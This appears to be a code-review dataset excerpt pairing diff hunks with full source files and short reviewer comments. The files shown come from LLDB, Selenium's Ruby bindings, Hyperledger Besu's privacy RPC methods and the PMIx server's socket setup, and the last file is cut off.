+ CompilerType var_type(GetCompilerTypeImpl());
+ if (var_type.IsValid()) {
+ ExecutionContext exe_ctx(GetExecutionContextRef());
+ llvm::Optional<uint64_t> size =
+ var_type.GetByteSize(exe_ctx.GetBestExecutionContextScope());
+ if (size && *size == 0) {
+ m_value.SetCompilerType(var_type);
+ return m_error.Success();
+ }
+ }
+
DWARFExpression &expr = variable->LocationExpression();
if (variable->GetLocationIsConstantValueData()) { | 1 | //===-- ValueObjectVariable.cpp ---------------------------------*- C++ -*-===//
//
// Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions.
// See https://llvm.org/LICENSE.txt for license information.
// SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
//
//===----------------------------------------------------------------------===//
#include "lldb/Core/ValueObjectVariable.h"
#include "lldb/Core/Address.h"
#include "lldb/Core/AddressRange.h"
#include "lldb/Core/Module.h"
#include "lldb/Core/Value.h"
#include "lldb/Expression/DWARFExpression.h"
#include "lldb/Symbol/Declaration.h"
#include "lldb/Symbol/Function.h"
#include "lldb/Symbol/ObjectFile.h"
#include "lldb/Symbol/SymbolContext.h"
#include "lldb/Symbol/SymbolContextScope.h"
#include "lldb/Symbol/Type.h"
#include "lldb/Symbol/Variable.h"
#include "lldb/Target/ExecutionContext.h"
#include "lldb/Target/LanguageRuntime.h"
#include "lldb/Target/Process.h"
#include "lldb/Target/RegisterContext.h"
#include "lldb/Target/Target.h"
#include "lldb/Utility/DataExtractor.h"
#include "lldb/Utility/RegisterValue.h"
#include "lldb/Utility/Scalar.h"
#include "lldb/Utility/Status.h"
#include "lldb/lldb-private-enumerations.h"
#include "lldb/lldb-types.h"
#include "llvm/ADT/StringRef.h"
#include <assert.h>
#include <memory>
namespace lldb_private {
class ExecutionContextScope;
}
namespace lldb_private {
class StackFrame;
}
namespace lldb_private {
struct RegisterInfo;
}
using namespace lldb_private;
lldb::ValueObjectSP
ValueObjectVariable::Create(ExecutionContextScope *exe_scope,
const lldb::VariableSP &var_sp) {
return (new ValueObjectVariable(exe_scope, var_sp))->GetSP();
}
ValueObjectVariable::ValueObjectVariable(ExecutionContextScope *exe_scope,
const lldb::VariableSP &var_sp)
: ValueObject(exe_scope), m_variable_sp(var_sp) {
// Do not attempt to construct one of these objects with no variable!
assert(m_variable_sp.get() != NULL);
m_name = var_sp->GetName();
}
ValueObjectVariable::~ValueObjectVariable() {}
CompilerType ValueObjectVariable::GetCompilerTypeImpl() {
Type *var_type = m_variable_sp->GetType();
if (var_type)
return var_type->GetForwardCompilerType();
return CompilerType();
}
ConstString ValueObjectVariable::GetTypeName() {
Type *var_type = m_variable_sp->GetType();
if (var_type)
return var_type->GetName();
return ConstString();
}
ConstString ValueObjectVariable::GetDisplayTypeName() {
Type *var_type = m_variable_sp->GetType();
if (var_type) {
const SymbolContext *sc = nullptr;
if (GetFrameSP())
sc = &GetFrameSP()->GetSymbolContext(lldb::eSymbolContextFunction);
return var_type->GetForwardCompilerType().GetDisplayTypeName(sc);
}
return ConstString();
}
ConstString ValueObjectVariable::GetQualifiedTypeName() {
Type *var_type = m_variable_sp->GetType();
if (var_type)
return var_type->GetQualifiedName();
return ConstString();
}
size_t ValueObjectVariable::CalculateNumChildren(uint32_t max) {
CompilerType type(GetCompilerType());
if (!type.IsValid())
return 0;
ExecutionContext exe_ctx(GetExecutionContextRef());
const bool omit_empty_base_classes = true;
auto child_count = type.GetNumChildren(omit_empty_base_classes, &exe_ctx);
return child_count <= max ? child_count : max;
}
uint64_t ValueObjectVariable::GetByteSize() {
ExecutionContext exe_ctx(GetExecutionContextRef());
CompilerType type(GetCompilerType());
if (!type.IsValid())
return 0;
return type.GetByteSize(exe_ctx.GetBestExecutionContextScope()).getValueOr(0);
}
lldb::ValueType ValueObjectVariable::GetValueType() const {
if (m_variable_sp)
return m_variable_sp->GetScope();
return lldb::eValueTypeInvalid;
}
bool ValueObjectVariable::UpdateValue() {
SetValueIsValid(false);
m_error.Clear();
Variable *variable = m_variable_sp.get();
DWARFExpression &expr = variable->LocationExpression();
if (variable->GetLocationIsConstantValueData()) {
// expr doesn't contain DWARF bytes, it contains the constant variable
// value bytes themselves...
if (expr.GetExpressionData(m_data)) {
if (m_data.GetDataStart() && m_data.GetByteSize())
m_value.SetBytes(m_data.GetDataStart(), m_data.GetByteSize());
m_value.SetContext(Value::eContextTypeVariable, variable);
} else {
CompilerType var_type(GetCompilerTypeImpl());
if (var_type.IsValid()) {
ExecutionContext exe_ctx(GetExecutionContextRef());
llvm::Optional<uint64_t> size =
var_type.GetByteSize(exe_ctx.GetBestExecutionContextScope());
if (size && *size == 0)
m_value.SetCompilerType(var_type);
else
m_error.SetErrorString("empty constant data");
}
}
// constant bytes can't be edited - sorry
m_resolved_value.SetContext(Value::eContextTypeInvalid, NULL);
SetAddressTypeOfChildren(eAddressTypeInvalid);
} else {
lldb::addr_t loclist_base_load_addr = LLDB_INVALID_ADDRESS;
ExecutionContext exe_ctx(GetExecutionContextRef());
Target *target = exe_ctx.GetTargetPtr();
if (target) {
m_data.SetByteOrder(target->GetArchitecture().GetByteOrder());
m_data.SetAddressByteSize(target->GetArchitecture().GetAddressByteSize());
}
if (expr.IsLocationList()) {
SymbolContext sc;
variable->CalculateSymbolContext(&sc);
if (sc.function)
loclist_base_load_addr =
sc.function->GetAddressRange().GetBaseAddress().GetLoadAddress(
target);
}
Value old_value(m_value);
if (expr.Evaluate(&exe_ctx, nullptr, loclist_base_load_addr, nullptr,
nullptr, m_value, &m_error)) {
m_resolved_value = m_value;
m_value.SetContext(Value::eContextTypeVariable, variable);
CompilerType compiler_type = GetCompilerType();
if (compiler_type.IsValid())
m_value.SetCompilerType(compiler_type);
Value::ValueType value_type = m_value.GetValueType();
Process *process = exe_ctx.GetProcessPtr();
const bool process_is_alive = process && process->IsAlive();
const uint32_t type_info =
compiler_type.IsValid() ? compiler_type.GetTypeInfo() : 0;
const bool is_pointer_or_ref =
(type_info & (lldb::eTypeIsPointer | lldb::eTypeIsReference)) != 0;
// BEGIN Swift
if (variable->GetType() && variable->GetType() &&
variable->GetType()->IsSwiftFixedValueBuffer())
if (auto process_sp = GetProcessSP())
if (auto runtime = process_sp->GetLanguageRuntime(
compiler_type.GetMinimumLanguage())) {
if (!runtime->IsStoredInlineInBuffer(compiler_type)) {
lldb::addr_t addr =
m_value.GetScalar().ULongLong(LLDB_INVALID_ADDRESS);
if (addr != LLDB_INVALID_ADDRESS) {
Target &target = process_sp->GetTarget();
size_t ptr_size = process_sp->GetAddressByteSize();
lldb::addr_t deref_addr;
target.ReadMemory(addr, false, &deref_addr, ptr_size, m_error);
m_value.GetScalar() = deref_addr;
}
}
}
// END Swift
switch (value_type) {
case Value::eValueTypeFileAddress:
// If this type is a pointer, then its children will be considered load
// addresses if the pointer or reference is dereferenced, but only if
// the process is alive.
//
// There could be global variables like in the following code:
// struct LinkedListNode { Foo* foo; LinkedListNode* next; };
// Foo g_foo1;
// Foo g_foo2;
// LinkedListNode g_second_node = { &g_foo2, NULL };
// LinkedListNode g_first_node = { &g_foo1, &g_second_node };
//
// When we aren't running, we should be able to look at these variables
// using the "target variable" command. Children of the "g_first_node"
// always will be of the same address type as the parent. But children
// of the "next" member of LinkedListNode will become load addresses if
// we have a live process, or remain what a file address if it what a
// file address.
if (process_is_alive && is_pointer_or_ref)
SetAddressTypeOfChildren(eAddressTypeLoad);
else
SetAddressTypeOfChildren(eAddressTypeFile);
break;
case Value::eValueTypeHostAddress:
// Same as above for load addresses, except children of pointer or refs
// are always load addresses. Host addresses are used to store freeze
// dried variables. If this type is a struct, the entire struct
// contents will be copied into the heap of the
// LLDB process, but we do not currently follow any pointers.
if (is_pointer_or_ref)
SetAddressTypeOfChildren(eAddressTypeLoad);
else
SetAddressTypeOfChildren(eAddressTypeHost);
break;
case Value::eValueTypeLoadAddress:
case Value::eValueTypeScalar:
case Value::eValueTypeVector:
SetAddressTypeOfChildren(eAddressTypeLoad);
break;
}
switch (value_type) {
case Value::eValueTypeVector:
// fall through
case Value::eValueTypeScalar:
// The variable value is in the Scalar value inside the m_value. We can
// point our m_data right to it.
m_error =
m_value.GetValueAsData(&exe_ctx, m_data, 0, GetModule().get());
break;
case Value::eValueTypeFileAddress:
case Value::eValueTypeLoadAddress:
case Value::eValueTypeHostAddress:
// The DWARF expression result was an address in the inferior process.
// If this variable is an aggregate type, we just need the address as
// the main value as all child variable objects will rely upon this
// location and add an offset and then read their own values as needed.
// If this variable is a simple type, we read all data for it into
// m_data. Make sure this type has a value before we try and read it
// If we have a file address, convert it to a load address if we can.
if (value_type == Value::eValueTypeFileAddress && process_is_alive)
m_value.ConvertToLoadAddress(GetModule().get(), target);
if (!CanProvideValue()) {
// this value object represents an aggregate type whose children have
// values, but this object does not. So we say we are changed if our
// location has changed.
SetValueDidChange(value_type != old_value.GetValueType() ||
m_value.GetScalar() != old_value.GetScalar());
} else {
// Copy the Value and set the context to use our Variable so it can
// extract read its value into m_data appropriately
Value value(m_value);
value.SetContext(Value::eContextTypeVariable, variable);
m_error =
value.GetValueAsData(&exe_ctx, m_data, 0, GetModule().get());
SetValueDidChange(value_type != old_value.GetValueType() ||
m_value.GetScalar() != old_value.GetScalar());
}
break;
}
SetValueIsValid(m_error.Success());
} else {
// could not find location, won't allow editing
m_resolved_value.SetContext(Value::eContextTypeInvalid, NULL);
}
}
return m_error.Success();
}
bool ValueObjectVariable::IsInScope() {
const ExecutionContextRef &exe_ctx_ref = GetExecutionContextRef();
if (exe_ctx_ref.HasFrameRef()) {
ExecutionContext exe_ctx(exe_ctx_ref);
StackFrame *frame = exe_ctx.GetFramePtr();
if (frame) {
return m_variable_sp->IsInScope(frame);
} else {
// This ValueObject had a frame at one time, but now we can't locate it,
// so return false since we probably aren't in scope.
return false;
}
}
// We have a variable that wasn't tied to a frame, which means it is a global
// and is always in scope.
return true;
}
lldb::ModuleSP ValueObjectVariable::GetModule() {
if (m_variable_sp) {
SymbolContextScope *sc_scope = m_variable_sp->GetSymbolContextScope();
if (sc_scope) {
return sc_scope->CalculateSymbolContextModule();
}
}
return lldb::ModuleSP();
}
SymbolContextScope *ValueObjectVariable::GetSymbolContextScope() {
if (m_variable_sp)
return m_variable_sp->GetSymbolContextScope();
return NULL;
}
bool ValueObjectVariable::GetDeclaration(Declaration &decl) {
if (m_variable_sp) {
decl = m_variable_sp->GetDeclaration();
return true;
}
return false;
}
const char *ValueObjectVariable::GetLocationAsCString() {
if (m_resolved_value.GetContextType() == Value::eContextTypeRegisterInfo)
return GetLocationAsCStringImpl(m_resolved_value, m_data);
else
return ValueObject::GetLocationAsCString();
}
bool ValueObjectVariable::SetValueFromCString(const char *value_str,
Status &error) {
if (!UpdateValueIfNeeded()) {
error.SetErrorString("unable to update value before writing");
return false;
}
if (m_resolved_value.GetContextType() == Value::eContextTypeRegisterInfo) {
RegisterInfo *reg_info = m_resolved_value.GetRegisterInfo();
ExecutionContext exe_ctx(GetExecutionContextRef());
RegisterContext *reg_ctx = exe_ctx.GetRegisterContext();
RegisterValue reg_value;
if (!reg_info || !reg_ctx) {
error.SetErrorString("unable to retrieve register info");
return false;
}
error = reg_value.SetValueFromString(reg_info, llvm::StringRef(value_str));
if (error.Fail())
return false;
if (reg_ctx->WriteRegister(reg_info, reg_value)) {
SetNeedsUpdate();
return true;
} else {
error.SetErrorString("unable to write back to register");
return false;
}
} else
return ValueObject::SetValueFromCString(value_str, error);
}
bool ValueObjectVariable::SetData(DataExtractor &data, Status &error) {
if (!UpdateValueIfNeeded()) {
error.SetErrorString("unable to update value before writing");
return false;
}
if (m_resolved_value.GetContextType() == Value::eContextTypeRegisterInfo) {
RegisterInfo *reg_info = m_resolved_value.GetRegisterInfo();
ExecutionContext exe_ctx(GetExecutionContextRef());
RegisterContext *reg_ctx = exe_ctx.GetRegisterContext();
RegisterValue reg_value;
if (!reg_info || !reg_ctx) {
error.SetErrorString("unable to retrieve register info");
return false;
}
error = reg_value.SetValueFromData(reg_info, data, 0, true);
if (error.Fail())
return false;
if (reg_ctx->WriteRegister(reg_info, reg_value)) {
SetNeedsUpdate();
return true;
} else {
error.SetErrorString("unable to write back to register");
return false;
}
} else
return ValueObject::SetData(data, error);
}
| 1 | 19,300 | Because of this new early exit. | apple-swift-lldb | cpp |
@@ -57,8 +57,10 @@ module Selenium
#
# @return [Driver]
#
- # @see Selenium::WebDriver::Remote::Bridge
+ # @see Selenium::WebDriver::Remote::OSSBridge
+ # @see Selenium::WebDriver::Remote::W3CBridge
# @see Selenium::WebDriver::Firefox::Bridge
+ # @see Selenium::WebDriver::Firefox::W3CBridge
# @see Selenium::WebDriver::IE::Bridge
# @see Selenium::WebDriver::Edge::Bridge
# @see Selenium::WebDriver::Chrome::Bridge | 1 | # encoding: utf-8
#
# Licensed to the Software Freedom Conservancy (SFC) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The SFC licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
require 'childprocess'
require 'tmpdir'
require 'fileutils'
require 'date'
require 'json'
require 'selenium/webdriver/common'
require 'selenium/webdriver/atoms'
module Selenium
module WebDriver
Point = Struct.new(:x, :y)
Dimension = Struct.new(:width, :height)
Location = Struct.new(:latitude, :longitude, :altitude)
autoload :Chrome, 'selenium/webdriver/chrome'
autoload :Edge, 'selenium/webdriver/edge'
autoload :Firefox, 'selenium/webdriver/firefox'
autoload :IE, 'selenium/webdriver/ie'
autoload :PhantomJS, 'selenium/webdriver/phantomjs'
autoload :Remote, 'selenium/webdriver/remote'
autoload :Safari, 'selenium/webdriver/safari'
autoload :Support, 'selenium/webdriver/support'
# @api private
def self.root
@root ||= File.expand_path('../..', __FILE__)
end
#
# Create a new Driver instance with the correct bridge for the given browser
#
# @param browser [:ie, :internet_explorer, :edge, :remote, :chrome, :firefox, :ff, :phantomjs, :safari]
# the driver type to use
# @param *rest
# arguments passed to Bridge.new
#
# @return [Driver]
#
# @see Selenium::WebDriver::Remote::Bridge
# @see Selenium::WebDriver::Firefox::Bridge
# @see Selenium::WebDriver::IE::Bridge
# @see Selenium::WebDriver::Edge::Bridge
# @see Selenium::WebDriver::Chrome::Bridge
# @see Selenium::WebDriver::PhantomJS::Bridge
# @see Selenium::WebDriver::Safari::Bridge
#
# @example
#
# WebDriver.for :firefox, :profile => "some-profile"
# WebDriver.for :firefox, :profile => Profile.new
# WebDriver.for :remote, :url => "http://localhost:4444/wd/hub", :desired_capabilities => caps
#
# One special argument is not passed on to the bridges, :listener.
# You can pass a listener for this option to get notified of WebDriver events.
# The passed object must respond to #call or implement the methods from AbstractEventListener.
#
# @see Selenium::WebDriver::Support::AbstractEventListener
#
def self.for(*args)
WebDriver::Driver.for(*args)
end
end # WebDriver
end # Selenium
| 1 | 14,227 | Maybe call it `WireBridge`? | SeleniumHQ-selenium | rb |
@@ -150,12 +150,16 @@ public abstract class PrivacyApiGroupJsonRpcMethods extends ApiGroupJsonRpcMetho
private JsonRpcMethod createPrivacyMethod(
final PrivacyParameters privacyParameters, final JsonRpcMethod rpcMethod) {
- if (rpcMethod.getName().equals(RpcMethod.ETH_SEND_RAW_PRIVATE_TRANSACTION.getMethodName())) {
+ final String methodName = rpcMethod.getName();
+ if (methodName.equals(RpcMethod.ETH_SEND_RAW_PRIVATE_TRANSACTION.getMethodName())) {
+ return rpcMethod;
+ } else if (methodName.equals(RpcMethod.PRIV_DISTRIBUTE_RAW_TRANSACTION.getMethodName())
+ && privacyParameters.getGoQuorumPrivacyParameters().isPresent()) {
return rpcMethod;
} else if (privacyParameters.isEnabled() && privacyParameters.isMultiTenancyEnabled()) {
return new MultiTenancyRpcMethodDecorator(rpcMethod);
} else if (!privacyParameters.isEnabled()) {
- return new DisabledPrivacyRpcMethod(rpcMethod.getName());
+ return new DisabledPrivacyRpcMethod(methodName);
} else {
return rpcMethod;
} | 1 | /*
* Copyright ConsenSys AG.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
* an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
* specific language governing permissions and limitations under the License.
*
* SPDX-License-Identifier: Apache-2.0
*/
package org.hyperledger.besu.ethereum.api.jsonrpc.methods;
import org.hyperledger.besu.ethereum.api.jsonrpc.LatestNonceProvider;
import org.hyperledger.besu.ethereum.api.jsonrpc.RpcMethod;
import org.hyperledger.besu.ethereum.api.jsonrpc.internal.methods.JsonRpcMethod;
import org.hyperledger.besu.ethereum.api.jsonrpc.internal.privacy.methods.DisabledPrivacyRpcMethod;
import org.hyperledger.besu.ethereum.api.jsonrpc.internal.privacy.methods.EnclavePublicKeyProvider;
import org.hyperledger.besu.ethereum.api.jsonrpc.internal.privacy.methods.MultiTenancyRpcMethodDecorator;
import org.hyperledger.besu.ethereum.api.query.BlockchainQueries;
import org.hyperledger.besu.ethereum.api.query.PrivacyQueries;
import org.hyperledger.besu.ethereum.core.Address;
import org.hyperledger.besu.ethereum.core.PrivacyParameters;
import org.hyperledger.besu.ethereum.eth.transactions.PendingTransactions;
import org.hyperledger.besu.ethereum.eth.transactions.TransactionPool;
import org.hyperledger.besu.ethereum.mainnet.ProtocolSchedule;
import org.hyperledger.besu.ethereum.privacy.ChainHeadPrivateNonceProvider;
import org.hyperledger.besu.ethereum.privacy.DefaultPrivacyController;
import org.hyperledger.besu.ethereum.privacy.MultiTenancyPrivacyController;
import org.hyperledger.besu.ethereum.privacy.PrivacyController;
import org.hyperledger.besu.ethereum.privacy.PrivateNonceProvider;
import org.hyperledger.besu.ethereum.privacy.PrivateTransactionSimulator;
import org.hyperledger.besu.ethereum.privacy.markertransaction.FixedKeySigningPrivateMarkerTransactionFactory;
import org.hyperledger.besu.ethereum.privacy.markertransaction.PrivateMarkerTransactionFactory;
import org.hyperledger.besu.ethereum.privacy.markertransaction.RandomSigningPrivateMarkerTransactionFactory;
import java.math.BigInteger;
import java.util.Map;
import java.util.Optional;
import java.util.stream.Collectors;
public abstract class PrivacyApiGroupJsonRpcMethods extends ApiGroupJsonRpcMethods {
private final BlockchainQueries blockchainQueries;
private final ProtocolSchedule protocolSchedule;
private final TransactionPool transactionPool;
private final PrivacyParameters privacyParameters;
private final PrivateNonceProvider privateNonceProvider;
private final PrivacyQueries privacyQueries;
protected PrivacyApiGroupJsonRpcMethods(
final BlockchainQueries blockchainQueries,
final ProtocolSchedule protocolSchedule,
final TransactionPool transactionPool,
final PrivacyParameters privacyParameters) {
this.blockchainQueries = blockchainQueries;
this.protocolSchedule = protocolSchedule;
this.transactionPool = transactionPool;
this.privacyParameters = privacyParameters;
this.privateNonceProvider =
new ChainHeadPrivateNonceProvider(
blockchainQueries.getBlockchain(),
privacyParameters.getPrivateStateRootResolver(),
privacyParameters.getPrivateWorldStateArchive());
this.privacyQueries =
new PrivacyQueries(blockchainQueries, privacyParameters.getPrivateWorldStateReader());
}
public BlockchainQueries getBlockchainQueries() {
return blockchainQueries;
}
public ProtocolSchedule getProtocolSchedule() {
return protocolSchedule;
}
public TransactionPool getTransactionPool() {
return transactionPool;
}
public PrivacyParameters getPrivacyParameters() {
return privacyParameters;
}
@Override
protected Map<String, JsonRpcMethod> create() {
final PrivateMarkerTransactionFactory markerTransactionFactory =
createPrivateMarkerTransactionFactory(
privacyParameters, blockchainQueries, transactionPool.getPendingTransactions());
final EnclavePublicKeyProvider enclavePublicProvider =
EnclavePublicKeyProvider.build(privacyParameters);
final PrivacyController privacyController = createPrivacyController(markerTransactionFactory);
return create(privacyController, enclavePublicProvider).entrySet().stream()
.collect(
Collectors.toMap(
Map.Entry::getKey,
entry -> createPrivacyMethod(privacyParameters, entry.getValue())));
}
protected abstract Map<String, JsonRpcMethod> create(
final PrivacyController privacyController,
final EnclavePublicKeyProvider enclavePublicKeyProvider);
private PrivateMarkerTransactionFactory createPrivateMarkerTransactionFactory(
final PrivacyParameters privacyParameters,
final BlockchainQueries blockchainQueries,
final PendingTransactions pendingTransactions) {
final Address privateContractAddress =
Address.privacyPrecompiled(privacyParameters.getPrivacyAddress());
if (privacyParameters.getSigningKeyPair().isPresent()) {
return new FixedKeySigningPrivateMarkerTransactionFactory(
privateContractAddress,
new LatestNonceProvider(blockchainQueries, pendingTransactions),
privacyParameters.getSigningKeyPair().get());
}
return new RandomSigningPrivateMarkerTransactionFactory(privateContractAddress);
}
private PrivacyController createPrivacyController(
final PrivateMarkerTransactionFactory markerTransactionFactory) {
final Optional<BigInteger> chainId = protocolSchedule.getChainId();
final DefaultPrivacyController defaultPrivacyController =
new DefaultPrivacyController(
getBlockchainQueries().getBlockchain(),
privacyParameters,
chainId,
markerTransactionFactory,
createPrivateTransactionSimulator(),
privateNonceProvider,
privacyParameters.getPrivateWorldStateReader());
return privacyParameters.isMultiTenancyEnabled()
? new MultiTenancyPrivacyController(
defaultPrivacyController,
chainId,
privacyParameters.getEnclave(),
privacyParameters.isOnchainPrivacyGroupsEnabled())
: defaultPrivacyController;
}
PrivacyQueries getPrivacyQueries() {
return privacyQueries;
}
private JsonRpcMethod createPrivacyMethod(
final PrivacyParameters privacyParameters, final JsonRpcMethod rpcMethod) {
if (rpcMethod.getName().equals(RpcMethod.ETH_SEND_RAW_PRIVATE_TRANSACTION.getMethodName())) {
return rpcMethod;
} else if (privacyParameters.isEnabled() && privacyParameters.isMultiTenancyEnabled()) {
return new MultiTenancyRpcMethodDecorator(rpcMethod);
} else if (!privacyParameters.isEnabled()) {
return new DisabledPrivacyRpcMethod(rpcMethod.getName());
} else {
return rpcMethod;
}
}
private PrivateTransactionSimulator createPrivateTransactionSimulator() {
return new PrivateTransactionSimulator(
getBlockchainQueries().getBlockchain(),
getBlockchainQueries().getWorldStateArchive(),
getProtocolSchedule(),
getPrivacyParameters());
}
}
| 1 | 24,434 | can this be removed now? | hyperledger-besu | java |
@@ -213,8 +213,11 @@ static pmix_status_t initialize_server_base(pmix_server_module_t *module)
}
/* for now, just setup the v1.1 series rendezvous point
- * we use the pid to reduce collisions */
- if (0 > asprintf(&pmix_pid, "%s/pmix-%d", tdir, mypid)) {
+ * - use userid to avoid situation where user with other UID but same PID
+ * has created the usock and terminate abnormally and we have no way to
+ * remove the file
+ * - use the pid to reduce collisions */
+ if (0 > asprintf(&pmix_pid, "%s/pmix-%d.%d", tdir, getuid(), mypid)) {
return PMIX_ERR_NOMEM;
}
| 1 | /* -*- Mode: C; c-basic-offset:4 ; indent-tabs-mode:nil -*- */
/*
* Copyright (c) 2014-2016 Intel, Inc. All rights reserved.
* Copyright (c) 2014-2016 Research Organization for Information Science
* and Technology (RIST). All rights reserved.
* Copyright (c) 2014-2015 Artem Y. Polyakov <[email protected]>.
* All rights reserved.
* Copyright (c) 2016 Mellanox Technologies, Inc.
* All rights reserved.
* Copyright (c) 2016 IBM Corporation. All rights reserved.
* $COPYRIGHT$
*
* Additional copyrights may follow
*
* $HEADER$
*/
#include <src/include/pmix_config.h>
#include <src/include/types.h>
#include <src/include/pmix_stdint.h>
#include <src/include/pmix_socket_errno.h>
#include <pmix_server.h>
#include <pmix_common.h>
#include "src/include/pmix_globals.h"
#ifdef HAVE_STRING_H
#include <string.h>
#endif
#include <fcntl.h>
#ifdef HAVE_UNISTD_H
#include <unistd.h>
#endif
#ifdef HAVE_SYS_SOCKET_H
#include <sys/socket.h>
#endif
#ifdef HAVE_SYS_UN_H
#include <sys/un.h>
#endif
#ifdef HAVE_SYS_UIO_H
#include <sys/uio.h>
#endif
#ifdef HAVE_SYS_TYPES_H
#include <sys/types.h>
#endif
#include <ctype.h>
#include <sys/stat.h>
#include PMIX_EVENT_HEADER
#include PMIX_EVENT2_THREAD_HEADER
#include "src/util/argv.h"
#include "src/util/error.h"
#include "src/util/output.h"
#include "src/util/pmix_environ.h"
#include "src/util/show_help.h"
#include "src/mca/base/base.h"
#include "src/mca/base/pmix_mca_base_var.h"
#include "src/mca/pinstalldirs/base/base.h"
#include "src/runtime/pmix_progress_threads.h"
#include "src/usock/usock.h"
#include "src/sec/pmix_sec.h"
#if defined(PMIX_ENABLE_DSTORE) && (PMIX_ENABLE_DSTORE == 1)
#include "src/dstore/pmix_dstore.h"
#endif /* PMIX_ENABLE_DSTORE */
#include "pmix_server_ops.h"
// global variables
pmix_server_globals_t pmix_server_globals = {{{0}}};
// local variables
static char *security_mode = NULL;
static pid_t mypid;
static char *mytmpdir = NULL;
static char *systmpdir = NULL;
// local functions for connection support
static void server_message_handler(struct pmix_peer_t *pr, pmix_usock_hdr_t *hdr,
pmix_buffer_t *buf, void *cbdata);
static inline int _my_client(const char *nspace, pmix_rank_t rank);
/* queue a message to be sent to one of our procs - must
* provide the following params:
*
* p - the peer object of the process
* t - tag to be sent to
* b - buffer to be sent
*/
void pmix_server_queue_message(int fd, short args, void *cbdata)
{
pmix_usock_queue_t *queue = (pmix_usock_queue_t*)cbdata;
pmix_usock_send_t *snd;
pmix_output_verbose(2, pmix_globals.debug_output,
"[%s:%d] queue callback called: reply to %s:%d on tag %d",
__FILE__, __LINE__,
(queue->peer)->info->nptr->nspace,
(queue->peer)->info->rank, (queue->tag));
snd = PMIX_NEW(pmix_usock_send_t);
snd->hdr.pindex = pmix_globals.pindex;
snd->hdr.tag = (queue->tag);
snd->hdr.nbytes = (queue->buf)->bytes_used;
snd->data = (queue->buf);
/* always start with the header */
snd->sdptr = (char*)&snd->hdr;
snd->sdbytes = sizeof(pmix_usock_hdr_t);
/* if there is no message on-deck, put this one there */
if (NULL == (queue->peer)->send_msg) {
(queue->peer)->send_msg = snd;
} else {
/* add it to the queue */
pmix_list_append(&(queue->peer)->send_queue, &snd->super);
}
/* ensure the send event is active */
if (!(queue->peer)->send_ev_active) {
event_add(&(queue->peer)->send_event, 0);
(queue->peer)->send_ev_active = true;
}
PMIX_RELEASE(queue);
}
static pmix_status_t initialize_server_base(pmix_server_module_t *module)
{
int debug_level;
char *tdir, *evar;
char * pmix_pid;
pmix_listener_t *listener;
pmix_status_t ret;
/* initialize the output system */
if (!pmix_output_init()) {
fprintf(stderr, "PMIx server was unable to initialize its output system\n");
return PMIX_ERR_INIT;
}
/* initialize install dirs code */
if (PMIX_SUCCESS != (ret = pmix_mca_base_framework_open(&pmix_pinstalldirs_base_framework, 0))) {
fprintf(stderr, "pmix_pinstalldirs_base_open() failed -- process will likely abort (%s:%d, returned %d instead of PMIX_SUCCESS)\n",
__FILE__, __LINE__, ret);
return ret;
}
if (PMIX_SUCCESS != pmix_show_help_init()) {
fprintf(stderr, "PMIx server was unable to initialize its show_help system\n");
return PMIX_ERR_INIT;
}
/* setup the globals */
pmix_globals_init();
memset(&pmix_server_globals, 0, sizeof(pmix_server_globals));
/* mark that I am a server */
pmix_globals.server = true;
/* look for our namespace, if one was given */
if (NULL == (evar = getenv("PMIX_SERVER_NAMESPACE"))) {
/* use a fake namespace */
(void)strncpy(pmix_globals.myid.nspace, "pmix-server", PMIX_MAX_NSLEN);
} else {
(void)strncpy(pmix_globals.myid.nspace, evar, PMIX_MAX_NSLEN);
}
/* look for our rank, if one was given */
mypid = getpid();
if (NULL == (evar = getenv("PMIX_SERVER_RANK"))) {
/* use our pid */
pmix_globals.myid.rank = mypid;
} else {
pmix_globals.myid.rank = strtol(evar, NULL, 10);
}
/* initialize the datatype support */
pmix_bfrop_open();
/* setup the server-specific globals */
PMIX_CONSTRUCT(&pmix_server_globals.clients, pmix_pointer_array_t);
pmix_pointer_array_init(&pmix_server_globals.clients, 1, INT_MAX, 1);
PMIX_CONSTRUCT(&pmix_server_globals.collectives, pmix_list_t);
PMIX_CONSTRUCT(&pmix_server_globals.remote_pnd, pmix_list_t);
PMIX_CONSTRUCT(&pmix_server_globals.gdata, pmix_buffer_t);
PMIX_CONSTRUCT(&pmix_server_globals.events, pmix_list_t);
PMIX_CONSTRUCT(&pmix_server_globals.local_reqs, pmix_list_t);
PMIX_CONSTRUCT(&pmix_server_globals.notifications, pmix_ring_buffer_t);
PMIX_CONSTRUCT(&pmix_server_globals.listeners, pmix_list_t);
pmix_ring_buffer_init(&pmix_server_globals.notifications, 256);
/* see if debug is requested */
if (NULL != (evar = getenv("PMIX_DEBUG"))) {
debug_level = strtol(evar, NULL, 10);
pmix_globals.debug_output = pmix_output_open(NULL);
pmix_output_set_verbosity(pmix_globals.debug_output, debug_level);
}
pmix_output_verbose(2, pmix_globals.debug_output,
"pmix:server init called");
/* setup the function pointers */
memset(&pmix_host_server, 0, sizeof(pmix_server_module_t));
pmix_host_server = *module;
/* init security */
pmix_sec_init();
security_mode = strdup(pmix_sec.name);
/* find the temp dir */
if (NULL != mytmpdir) {
tdir = mytmpdir;
} else if (NULL == (tdir = getenv("TMPDIR"))) {
if (NULL == (tdir = getenv("TEMP"))) {
if (NULL == (tdir = getenv("TMP"))) {
tdir = "/tmp";
}
}
}
/* for now, just setup the v1.1 series rendezvous point
* we use the pid to reduce collisions */
if (0 > asprintf(&pmix_pid, "%s/pmix-%d", tdir, mypid)) {
return PMIX_ERR_NOMEM;
}
if ((strlen(pmix_pid) + 1) > sizeof(listener->address.sun_path)-1) {
pmix_show_help("help-pmix-server.txt", "rnd-path-too-long", true, tdir, pmix_pid);
free(pmix_pid);
return PMIX_ERR_INVALID_LENGTH;
}
